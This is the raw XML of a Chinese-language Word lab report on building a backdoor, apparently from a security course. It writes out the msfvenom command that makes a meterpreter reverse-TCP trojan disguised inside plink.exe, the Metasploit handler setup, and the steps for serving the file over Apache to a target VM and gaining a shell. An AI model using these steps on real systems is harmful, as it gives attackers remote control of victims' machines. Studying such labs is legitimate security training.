                <w:numId w:val="1"/>
              </w:numPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial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实验内容三：后门程序</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE77B48" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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在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kali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输入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msfvenom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--platform windows -p windows/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meterpreter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>/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reverse_tcp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LHOST=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>10.0.2.6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LPORT=1337 -e x86/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shikata_ga_nai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-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i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5 -x /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usr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/share/windows-binaries/plink.exe -f exe &gt; /root/Documents/trojan.exe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命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74713BEA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123FAFD8" wp14:editId="3049A420">
                  <wp:extent cx="4588510" cy="1602740"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="9" name="图片 9" descr="屏幕快照 2018-10-25 下午4.54.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屏幕快照 2018-10-25 下午4.54.2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160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147A24" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="279E93EB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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="142A2204" wp14:editId="2F67A462">
                  <wp:extent cx="2800350" cy="2199005"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="10" name="图片 10" descr="屏幕快照 2018-10-25 下午4.54.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屏幕快照 2018-10-25 下午4.54.5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19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9D53E0" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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>use exploit/multi/handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A76002" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set payload windows/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meterpreter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>/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reverse_tcp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>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set LHOST 10.0.2.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>set LPORT 1337</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>设置协议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本机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端口信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771B304C" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>命令启动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6918D250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361A0E88" wp14:editId="20AC4376">
                  <wp:extent cx="3652520" cy="1869440"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
                  <wp:docPr id="11" name="图片 11" descr="屏幕快照 2018-10-25 下午4.55.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屏幕快照 2018-10-25 下午4.55.0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520" cy="186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926E5" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>service apache2 start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>启动</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Apache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2966053F" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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使用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cp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/root/Document/trojan.exe /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var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/www/html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将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>trojan.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>文件复制到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/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var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>/www/html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>目录下，使得靶机可以访问该文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E404A6" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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在靶机中打开</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>http://10.0.2.6/trojan.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>网址，下载并运行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>trojan.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B932813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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0BA4C75C" wp14:editId="4B80BE75">
                  <wp:extent cx="4020820" cy="3007360"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
                  <wp:docPr id="8" name="图片 8" descr="屏幕快照 2018-10-25 下午4.50.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屏幕快照 2018-10-25 下午4.50.5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20" cy="300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53D96" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>中折佣</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>命令检测此时</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>是否已经控制了靶机，可以对靶机进行攻击。</w:t>
            </w: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25176486" wp14:editId="0D78303D">
                  <wp:extent cx="5136515" cy="1113155"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="1270"/>
                  <wp:docPr id="12" name="图片 12" descr="屏幕快照 2018-10-25 下午4.55.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屏幕快照 2018-10-25 下午4.55.3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515" cy="111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897C9" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr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color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>中使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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mkdir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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>helloWorld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535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color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>命令，在桌面新建了一个文件夹。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0573A9E7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56DF598B" wp14:editId="517B0AFA">
                  <wp:extent cx="3539490" cy="610235"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
                  <wp:docPr id="13" name="图片 13" descr="屏幕快照 2018-10-25 下午4.55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屏幕快照 2018-10-25 下午4.55.4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490" cy="61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9B904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353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7860FEB8" wp14:editId="3C18DA3F">
                  <wp:extent cx="1320800" cy="2543175"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="14" name="图片 14" descr="屏幕快照 2018-10-25 下午4.55.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屏幕快照 2018-10-25 下午4.55.5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BADD6" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D583C">
            <w:pPr>
              <w:widowControl/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</w:p>
          <w:p w14:paraId="2658CD5A" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AE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【</w:t>
            </w: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结论</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37CAAAAC" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D583C">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:strike/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75024C11" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D58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  <w:p w14:paraId="742D223B" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D583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16ECD2F3" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D583C">
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:sectPr w:rsidR="000D58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"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SystemUIFont">
    <w:altName w:val="Segoe Print"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000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D4988CF5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D4988CF5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="EF75E74C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EF75E74C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="F4D854B2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F4D854B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="(%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="0E5F3980"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E5F3980"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="50" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="170D1D53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="170D1D53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5">
    <w:nsid w:val="283F65D8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="283F65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3915EA23"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3915EA2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3BE3674"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="43BE36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2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3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D583C"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00937AEC"/>
    <w:rsid w:val="0CEA3E4B"/>
    <w:rsid w:val="24CE79E7"/>
    <w:rsid w:val="40145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F2516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qFormat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5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6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等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="页眉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qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs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244</Words>
  <Characters>1394</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1635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卉梓 上官</dc:creator>
  <cp:lastModifiedBy>Microsoft Office 用户</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T07:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-02T14:49:00Z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